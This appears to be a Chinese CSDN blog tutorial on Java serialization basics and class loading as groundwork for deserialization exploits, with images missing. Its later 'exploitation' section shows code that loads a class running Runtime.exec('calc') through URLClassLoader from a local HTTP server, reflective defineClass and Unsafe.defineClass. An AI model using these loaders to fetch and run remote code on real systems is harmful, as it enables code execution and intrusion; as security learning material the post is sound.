java序列化基础知识

最新推荐文章于 2024-02-06 03:19:13 发布
最新推荐文章于 2024-02-06 03:19:13 发布
阅读量2.4k 收藏
点赞数
文章标签: web安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51458899/article/details/124100618
版权

java序列化基础知识

Java反序列化漏洞专题-基础篇(21/09/05更新类加载部分)_哔哩哔哩_bilibili

随便写个类

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-TKIZlcI3-1649662374011)(https://raw.githubusercontent.com/hmt38/abcd/main/image-20220410173136861.png)]

直接对他System.out.println(test);的话是这个效果

image-20220410173215043

为了更加直观,我们给他加个魔术方法__tostring

    public String toString(){
        System.out.println("OneClass{");
        System.out.println("public apple:"+this.apple);
        System.out.println("static banana:"+this.banana);
        System.out.println("protected pear:"+this.pear);
        System.out.println("private grapes:"+this.grapes);
        System.out.println("public transient gold:"+this.gold);
        return "}";
    }

new一个试试

image-20220410174549222

序列化反序列化都需要编写如下的函数

public  static  void  serialize(Object obj) throws IOException {
    ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
    oos.writeObject(obj);
}
//用于序列化
public  static  Object  unserialize(String Filename) throws IOException, ClassNotFoundException {
    ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
    Object obj = ois.readObject();
    return obj;
}
//用于反序列化

调用

serialize(test);
unserialize("ser.bin");

被序列化的类必须继承序列化接口

测试代码

image-20220410174455061

继承后:

public class OneClass  implements Serializable

image-20220410180112629

注意的点:

  • 静态的属性不可以被序列化
  • transeint关键字修饰的不可以被序列化

测试代码

OneClass.java

package org.apache.commons.collections;

import java.io.Serializable;

public class OneClass  implements Serializable
{
    public String apple;
    public static String banana;
    protected String pear;
    private String grapes;
    public transient String gold;

    public OneClass(){

    }

    public OneClass(String apple,String bannana,String pear,String grapes,String gold){
        this.apple = apple;
        this.banana = bannana;
        this.pear = pear;
        this.grapes = grapes;
        this.gold = gold;
    }
    public String toString(){
        System.out.println("OneClass{");
        System.out.println("public apple:"+this.apple);
        System.out.println("static banana:"+this.banana);
        System.out.println("protected pear:"+this.pear);
        System.out.println("private grapes:"+this.grapes);
        System.out.println("public transient gold:"+this.gold);
        return "}";
    }

}

ccone.java

package org.apache.commons.collections;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.rmi.CORBA.Tie;
import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

public class ccone {
    public  static  void  serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }

    public  static  Object  unserialize(String Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }

    public static void main(String[] args) throws Exception {
        OneClass test = new OneClass("apple1", "banana2", "pear3", "grapes4", "gold");
//        System.out.println(test);
        serialize(test);
        System.out.println(unserialize("ser.bin"));

    }
}

image-20220410182758131

但是这个static好像赋值附上去了,不懂

transient如果想要赋值的话,想要让他反序列化后能出现我们原本赋予的值,则需要重写readObject

参考vnctf的easyJava

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-a1IDND1X-1649662374017)(https://raw.githubusercontent.com/hmt38/abcd/main/image-20220410181801262.png)]

java的动态加载

image-20220410211633019

参考类的动态加载 - Java反序列化 - CTF知识点 | mikufans = (viewofthai.link)

类加载与反序列化

类加载的时候会执行代码

  • 初始化:

静态代码块

  • 实例化:

构造代码块 、 构造函数

动态类加载方法

  • Class.forname 可以初始化也可以不初始化

  • ClassLoader.loadClass 不进行初始化

测试

Person类

package org.apache.commons.collections;

public class Person {
    private String name;
    static  int age;

    Person(){
        System.out.println("无参构造方法");
    }

    static  void staticfunc(){
        System.out.println("静态方法");
    }

    static {
        System.out.println("静态代码块");
    }

    {
        System.out.println("构造代码块");
    }
}

main

public static void main(String[] args) throws Exception {
    Person person = new Person();

}

image-20220410210932184

Person.staticfunc();

image-20220410211155113

结论:类在new(实例化)的时候 无参构造方法,构造代码块,无参构造方法都会被调用,如果使用了静态方法,静态代码块也会被调用

测试

Class.forName("Person");

如果报错classnotfound的话记得加上包名

Class.forName("org.apache.commons.collections.Person");

image-20220410212015012

了解一下forname,跟进

image-20220410212816638

这里设置了个caller,调用了forName0,

跟进

private static native Class<?> forName0(String name, boolean initialize,
                                        ClassLoader loader,
                                        Class<?> caller)
    throws ClassNotFoundException;

然后发现上面还有个forname

image-20220410213034181

这个功能相对完整

阅读后,我们尝试不

Class.forName("org.apache.commons.collections.Person",false,ClassLoader.getSystemClassLoader());

image-20220410213205469

newInstance的时候都加载了

image-20220410213312617

ClassLorder

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CUp2ytzp-1649662374026)(https://raw.githubusercontent.com/hmt38/abcd/main/image-20220410213520352.png)]

双亲委派机制

image-20220410213549592

ClassLoader abc = ClassLoader.getSystemClassLoader();
Class<?> a = abc.loadClass("org.apache.commons.collections.Person");

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ohJsMx6u-1649662374028)(https://raw.githubusercontent.com/hmt38/abcd/main/image-20220410213956650.png)]

可以看到我们的loadClass并没有初始化

image-20220410214051330

跟进loadClass

image-20220410214254424

可以看到父类加载的一个递归程序的写法

这里感兴趣的同学可以参考@miku233师傅的(●´3`●)やれやれだぜ (viewofthai.link),跟着他xdebug调一下

利用

URLClassLoader

image-20220410223017997

test.java

import java.io.IOException;

public class test {
        static {
            try {
                Runtime.getRuntime().exec("calc");
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
}

命令行里面

javac test.java

生成test.class,把它放到D盘

或者是在idea里面new一个class文件,然后main函数里面在new这个类,最后跑去把class文件复制出来(推荐)

image-20220410221228483

main

package org.apache.commons.collections;

import java.net.URL;
import java.net.URLClassLoader;

public class exp {
    public static void main(String[] args) throws Exception {
        URLClassLoader urlClassLoader = new URLClassLoader(new URL[]{new URL("file:///D:\\")});
        Class<?> test = urlClassLoader.loadClass("org.apache.commons.collections.test");
        test.newInstance();

    }
}

没有包名的话是这个 Class<?> test = urlClassLoader.loadClass(“test”);

image-20220410222131823

放在服务器上开启http服务python -m http.server 7878

demo

package org.apache.commons.collections;

import java.net.URL;
import java.net.URLClassLoader;

public class exp {
    public static void main(String[] args) throws Exception {
        URLClassLoader urlClassLoader = new URLClassLoader(new URL[]{new URL("http://127.0.0.1:7878")});
        Class<?> test = urlClassLoader.loadClass("org.apache.commons.collections.test");
        test.newInstance();

    }
}

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-8gA8x48y-1649662374032)(https://raw.githubusercontent.com/hmt38/abcd/main/image-20220410222639593.png)]

ClassLoader.defineClass加载
package org.apache.commons.collections;

import java.lang.reflect.Method;
import java.nio.file.Files;
import java.nio.file.Paths;

public class exp {
    public static void main(String[] args) throws Exception {
        ClassLoader classLoader = ClassLoader.getSystemClassLoader();
        Method method = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
        method.setAccessible(true);

        byte[] code = Files.readAllBytes(Paths.get("D:\\test.class"));
        Class c = (Class) method.invoke(classLoader, "org.apache.commons.collections.test", code, 0, code.length);
        c.newInstance();

    }
}

image-20220410222824941

ClassLoader.class.getDeclaredMethod(“defineClass”, String.class, byte[].class, int.class, int.class);

byte[] code = Files.readAllBytes(Paths.get(“D:\test.class”));

上面是关键代码

Unsafe.definedclass加载

demo

package org.apache.commons.collections;

import sun.misc.Unsafe;

import java.io.File;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.net.URL;
import java.net.URLClassLoader;
import java.nio.file.Files;
import java.nio.file.Paths;

public class exp {
    public static void main(String[] args) throws Exception {
        ClassLoader classLoader = ClassLoader.getSystemClassLoader();
        byte[] code = Files.readAllBytes(Paths.get("D:\\test.class"));

        Class c = Unsafe.class;
        Field theUnsafe = c.getDeclaredField("theUnsafe");
        theUnsafe.setAccessible(true);
        Unsafe unsafe = (Unsafe) theUnsafe.get(null);
        Class c2 = (Class) unsafe.defineClass("org.apache.commons.collections.test", code, 0, code.length, classLoader, null);
        c2.newInstance();

    }
}

image-20220410223135634

ththaiai
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java 序列代码示例
06-14
java序列代码示例,详细讲解序列作用于使用注意规则项!!!
S01-java序列基础知识总结1
08-03
了解Java序列基础知识有助于深入理解类加载机制,特别是在安全性、自定义类加载和内存管理方面。下面我们将详细讨论Java的类加载过程以及如何利用自定义类加载器实现反序列。 1. **类加载流程**: - 当...
深入理解JAVA序列
weixin_34096182的博客
09-07 247
  如果你只知道实现 Serializable 接口的对象,可以序列为本地文件。那你最好再阅读该篇文章,文章对序列进行了更深一步的讨论,用实际的例子代码讲述了序列的高级认识,包括父类序列的问题、静态变量问题、transient 关键字的影响、序列 ID 问题。在笔者实际开发过程中,就多次遇到序列的问题,在该文章中也会与读者分享。 引言   将Java对象序列为二进...
java Serializable序列知识与整理
ailice001的博客
12-20 252
序列知识要点: 1:what    是什么     java对象序列  :把对象转换为字节序列的过程。   java对象反序列:把字节序列恢复为对象的过程。 2:why , 为什么要用序列,有什么优势 序列主要有两种用途:// 就是用来将对象编码成字节流,用于方便网络传输和存储对象 1) 把对象的字节序列永久地保存到硬盘上,通常存放在一个文件中; 2) 在网络上传送对象的字节序列。 ...
java-序列知识点整理
谢谢谢谢呵的博客
05-15 272
学习《Effective Java》和相关知识点,加入自己的理解整理。 序列 对象被序列后,成为字节流,可以在网络中传递或者存储在磁盘中,等待进行反序列的读取,将字节流组装成对象。 必须注意地是,对象序列保存的是对象的"状态",即它的成员变量。由此可知,对象序列不会关注类中的静态变量,因为static修饰的是类变量,它存在于对象实例之前,另外由transient关键字修饰的变量也不会被...
Java序列
weixin_42352733的博客
03-22 461
一、什么是序列?为什么要序列Java 序列就是指将对象转换为字节序列的过程,而反序列则是只将字节序列转换成目标对象的过程。 我们都知道,在进行浏览器访问的时候,我们看到的文本、图片、音频、视频等都是通过二进制序列进行传输的,那么如果我们需要将Java对象进行传输的时候,是不是也应该先将对象进行序列?答案是肯定的,我们需要先将Java对象进行序列,然后通过网络,IO进行传输,当到达目的地之后,再进行反序列获取到我们想要的对象,最后完成通信。 二、实现序列 搭建项目 ①User文
java基础知识面试题
02-21
不过它们都实现了同时实现了map、Cloneable(可复制)、Serializable(可序列)这三个接口。 2、对外提供的接口不同 Hashtable比HashMap多提供了elments() 和contains() 两个方法。 elments() 方法继承自...
Java基础知识点资源
最新发布
03-13
这个名为“Java基础知识点资源”的压缩包文件显然包含了丰富的学习材料,旨在帮助初学者掌握Java编程的基础知识。以下是一些可能包含在这些资源中的关键Java概念和知识点: 1. **Java语法基础**:这是学习任何编程...
java基础知识学习笔记
12-26
Java提供了丰富的IO流API,包括文件操作、流的读写、对象序列等。笔记会详细讲解字节流和字符流的区别,以及缓冲流、对象流和转换流的用法。 在网络编程方面,Java提供Socket编程接口,可以创建客户端和服务端...
java 序列 构造函数_序列,反序列与空参构造函数
weixin_35754676的博客
02-16 575
序列对象要想序列,需要类实现接口 Serializable与Externalizable其中之一Seializable类通过实现 java.io.Serializable 接口以启用其序列功能。未实现此接口的类将无法使其任何状态序列或反序列。可序列类的所有子类型本身都是可序列的。序列接口没有方法或字段,仅用于标识可序列的语义。如果实现Serializable接口,对象如何序列,...
Java-序列-详解
Java程序员的知识博客
02-06 874
如果我们需要持久 Java 对象比如将 Java 对象保存在文件中,或者在网络传输 Java 对象,这些场景都需要用到序列序列: 将数据结构或对象转换成二进制字节流的过程反序列:将在序列过程中所生成的二进制字节流转换成数据结构或者对象的过程对于 Java 这种面向对象编程语言来说,我们序列的都是对象(Object)也就是实例后的类(Class),但是在 C++这种半面向对象的语言中,struct(结构体)定义的是数据结构类型,而 class 对应的是对象类型。
java序列_详解Java序列和反序列
weixin_39634067的博客
11-14 100
1 概述首先我们介绍下序列和反序列的概念:序列:把Java对象转换为字节序列的过程。反序列:把字节序列恢复为Java对象的过程。对象的序列主要有两种用途:把对象的字节序列永久地保存到硬盘上,通常存放在一个文件中;(持久对象)在网络上传送对象的字节序列。(网络传输对象)2 使用在Java中,如果一个对象要想实现序列,必须要实现下面两个接口之一:Serializable 接口Extern...
看懂java序列,这篇就够了
AmazDreamer的博客
06-18 849
对于 Java 这种面向对象编程语言来说,我们序列的都是对象(Object)也就是实例后的类(Class),但是在 C++这种半面向对象的语言中,struct(结构体)定义的是数据结构类型,而 class 对应的是对象类型。但当输入的反序列的数据可被用户控制,那么攻击者即可通过构造恶意输入,让反序列产生非预期的对象,在此过程中执行构造的任意代码。因为,OSI 七层协议模型中的应用层、表示层和会话层对应的都是 TCP/IP 四层模型中的应用层,所以序列协议属于 TCP/IP 协议应用层的一部分。
通过URLDNS来入门java序列
weixin_44502336的博客
10-26 1079
URLDNS链复现
【笔记】Java - 序列(Serialization)、反序列、漏洞利用(urldns、CommonsCollections )
LawssssCat的博客
11-13 427
简单的序列例子 (实现Serializable 接口) 输出打印 可以看到,反序列时,对象中的块代码和构造函数中的代码不会执行,但是调用的方法将是序列对象中的方法。这就提供了在服务器反序列对象时注入代码的可能: 通过重写一些常见的可序列类的常见方法,诱导服务器调用,完成代码注入。方法如: equals、hashcode、toString问题:但是有一个毛病,这些方法调用次数不确定(重要是不一定会执行)。找一个反序列时必然调用的方法,正好java另外一个序列接口 Externalizable 的
Java序列-URLDNS学习
whojoe的博客
07-06 301
Java序列-URLDNS学习前言代码分析ysoserial中的利用方式参考文章 前言 在复现漏洞的时候经常使用dnslog来进行测试,当然有一定的局限性,只能在机器出网的时候才可以使用,并且在一些不知道利用链的情况下 使用urldns的利用链来进行打dnslog效果比较好,因为其没有诸多的限制 文章中如果有错误欢迎各位师傅斧正 代码 这里的代码是直接粘贴天下大木头师傅的,后面做学习分析 import java.io.*; import java.lang.reflect.Field; import j
java序列-URLDNS
GalaxySpaceX的博客
02-23 231
java序列-URLDNS分析
Java序列之URLDNS链
m0_62466350的博客
05-28 756
URLDNS链是java原生态的一条利用链,通常用于存在反序列漏洞进行验证的,因为是原生态,不存在什么版本限制。不限制jdk版本,使用Java内置类,对第三方依赖没有要求目标无回显,可以通过DNS请求来验证是否存在反序列漏洞URLDNS利用链,只能发起DNS请求,并不能进行其他利用这条链路还是比较简单的,通常用于存在反序列漏洞进行验证的,学好了才能更好的为后面打基础
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值